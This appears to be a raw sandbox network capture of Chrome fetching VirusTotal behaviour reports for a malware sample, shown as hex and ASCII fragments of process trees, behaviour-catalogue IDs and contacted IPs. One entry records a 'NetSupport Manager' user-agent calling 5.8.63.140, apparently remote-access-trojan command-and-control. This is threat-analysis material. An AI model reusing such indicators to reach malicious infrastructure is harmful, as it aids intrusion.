                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 34 38 31 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 63 72 61 73 68 70 61 64
                                                                                                                                                                                                                    Data Ascii: "children": [ { "process_id": "4816", "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=crashpad
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1280INData Raw: 65 73 73 5f 69 64 22 3a 20 22 35 36 37 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 63 68 72 6f 6d 65 2e 6d 6f 6a 6f 6d 2e 50 72 6f 63 65 73 73 6f 72 4d 65 74 72 69 63 73 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20
                                                                                                                                                                                                                    Data Ascii: ess_id": "5676", "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 38 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: rantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5308 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:8"
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 33 32 38 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55
                                                                                                                                                                                                                    Data Ascii: { "process_id": "3284", "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-U
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 36 38 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 38 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "process_id": "688", "name": "C:\\Windows\\system32\\services.exe", "children": [ { "process_id": "824",
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC1408INData Raw: 63 61 74 69 6f 6e 5c 5c 31 32 32 2e 30 2e 36 32 36 31 2e 31 31 32 5c 5c 65 6c 65 76 61 74 69 6f 6e 5f 73 65 72 76 69 63 65 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 31 35 30 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f 63 61 6c 53 79 73 74 65 6d 4e
                                                                                                                                                                                                                    Data Ascii: cation\\122.0.6261.112\\elevation_service.exe\"" }, { "process_id": "1504", "name": "C:\\Windows\\System32\\svchost.exe -k LocalSystemN


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    259192.168.2.165001974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:50 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:51 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: dc8f21647bf443ea8dd4fd0e008153be
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:51 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:51 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    260192.168.2.165002074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:54 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTUwNzcwMjU1MTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDEzLjQ0MQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: fc5143819e8a0958e8b5b8712c71bac5
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:55 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:55 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 62 63 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: " ], "mbc": [ { "id": "OB0001" }, { "id": "B0001" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC548INData Raw: 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 46 30 30 30 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 31 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b
                                                                                                                                                                                                                    Data Ascii: { "id": "F0005" }, { "id": "C0016" }, { "id": "C0018" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 45 31 30 38 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 43 30 30 30 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 33 36 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "id": "E1082" }, { "id": "OC0008" }, { "id": "C0036"
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 4e 65 74 53 75 70 70 6f 72 74 20 4d 61 6e 61 67 65 72 2f 31 2e 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 6f 73 74 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 70 6f 6e 73 65 5f 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 22 3a 20 22 36 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65
                                                                                                                                                                                                                    Data Ascii: "User-Agent": "NetSupport Manager/1.3", "Host": "5.8.63.140" }, "response_headers": { "Content-Length": "61", "Content-Type
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1280INData Raw: 69 6f 6e 5f 69 70 22 3a 20 22 37 34 2e 31 32 35 2e 32 30 31 2e 38 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 72 61 6e 73 70 6f 72 74 5f 6c 61 79 65 72 5f 70 72 6f 74 6f 63 6f 6c 22 3a 20 22 54 43 50 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 69 70 22 3a 20 22 31 35 2e 31 39 37 2e 31 36 37 2e 39 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ion_ip": "74.125.201.84", "destination_port": 443, "transport_layer_protocol": "TCP" }, { "destination_ip": "15.197.167.90",
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 32 35 35 2e 32 35 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 70 6f 72 74 22 3a 20 31 39 30 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 72 61 6e 73 70 6f 72 74 5f 6c 61 79 65 72 5f 70 72 6f 74 6f 63 6f 6c 22 3a 20 22 55 44 50 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 69 70 22 3a 20 22 32 32 34 2e 30 2e 30 2e 32 35 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f
                                                                                                                                                                                                                    Data Ascii: 255.250", "destination_port": 1900, "transport_layer_protocol": "UDP" }, { "destination_ip": "224.0.0.251", "destinatio
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 73 69 6e 67 6c 65 2d 61 72 67 75 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 61 73 61 6e 61 2e 63 6f 6d 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --single-argument https://asana.com/", "children": [ { "proc
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1280INData Raw: 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 36 37 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74
                                                                                                                                                                                                                    Data Ascii: 6.183000 /prefetch:3" }, { "process_id": "5676", "name": "\"C:\\Program Files\\Google\\Chrome\\Applicat
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 38 20 2d 2d 66 69 65
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5308 --fie


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    261192.168.2.165002174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:55 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:56 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1d81bbcd91a44771b6d82e56cd10dd1b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:56 GMT
